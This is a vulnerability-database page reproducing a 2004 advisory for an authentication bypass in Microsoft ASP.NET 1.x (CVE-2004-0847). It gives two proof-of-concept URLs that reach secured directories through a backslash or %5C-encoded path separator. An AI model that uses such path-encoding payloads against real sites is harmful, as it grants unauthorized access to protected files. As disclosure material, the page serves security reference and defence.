Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access

Related Vulnerabilities: CVE-2004-0847  
Publish Date: 06 Oct 2004
Author: anonymous
Source / Download Exploit 
                							

                source: http://www.securityfocus.com/bid/11342/info

Microsoft ASP.NET is reported prone to a remote information-disclosure vulnerability because the application fails to properly secure documents when handling malformed URI requests. 

An attacker may leverage this issue to bypass authentication required to access files in secured directories.

Mozilla Web Browser based proof of concept: 
http://www.example.com/secureDirectory\somefile.aspx 

Microsoft Internet Explorer based proof of concept: 
http://www.example.com/secureDirectory%5Csomefile.aspx

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started